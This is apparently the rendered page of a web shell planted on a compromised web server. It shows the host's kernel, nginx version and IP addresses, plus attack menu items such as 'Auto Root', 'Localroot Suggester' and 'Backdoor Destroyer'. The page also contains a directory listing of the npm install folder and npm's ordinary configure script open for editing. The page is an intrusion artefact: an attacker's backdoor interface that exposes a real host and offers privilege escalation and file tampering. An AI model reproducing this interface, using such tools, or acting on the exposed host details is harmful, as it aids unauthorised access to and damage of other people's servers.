Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.188.80.46
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
node_modules /
npm /
Delete
Unzip
Name
Size
Permission
Date
Action
bin
[ DIR ]
drwxr-xr-x
2022-01-26 16:43
changelogs
[ DIR ]
drwxr-xr-x
2022-01-26 16:43
docs
[ DIR ]
drwxr-xr-x
2022-01-26 16:43
lib
[ DIR ]
drwxr-xr-x
2022-01-26 16:43
man
[ DIR ]
drwxr-xr-x
2022-01-26 16:43
node_modules
[ DIR ]
drwxr-xr-x
2022-01-26 16:43
scripts
[ DIR ]
drwxr-xr-x
2022-01-26 16:43
tap-snapshots
[ DIR ]
drwxr-xr-x
2022-01-26 16:43
.licensee.json
245
B
-rw-r--r--
2022-01-10 12:20
.mailmap
3.2
KB
-rw-r--r--
2022-01-10 12:20
.npmignore
368
B
-rw-r--r--
2022-01-10 12:20
.npmrc
0
B
-rw-r--r--
2021-10-14 05:50
.travis.yml
269
B
-rw-r--r--
2022-01-10 12:20
AUTHORS
26.51
KB
-rw-r--r--
2022-01-10 12:20
CHANGELOG.md
157.23
KB
-rw-r--r--
2022-01-10 12:20
CONTRIBUTING.md
9.29
KB
-rw-r--r--
2022-01-10 12:20
LICENSE
9.51
KB
-rw-r--r--
2021-10-14 05:50
Makefile
4.02
KB
-rw-r--r--
2022-01-10 12:20
README.md
4.39
KB
-rw-r--r--
2022-01-10 12:20
configure
529
B
-rwxr-xr-x
2022-01-10 12:20
make.bat
156
B
-rw-r--r--
2022-01-10 12:20
package.json
7.84
KB
-rw-r--r--
2022-01-10 12:20
Save
Rename
#!/usr/bin/env bash # set configurations that will be "sticky" on this system, # surviving npm self-updates. CONFIGS=() i=0 # get the location of this file. unset CDPATH CONFFILE=$(cd $(dirname "$0"); pwd -P)/npmrc while [ $# -gt 0 ]; do conf="$1" case $conf in --help) echo "./configure --param=value ..." exit 0 ;; --*) CONFIGS[$i]="${conf:2}" ;; *) CONFIGS[$i]="$conf" ;; esac let i++ shift done for c in "${CONFIGS[@]}"; do echo "$c" >> "$CONFFILE" done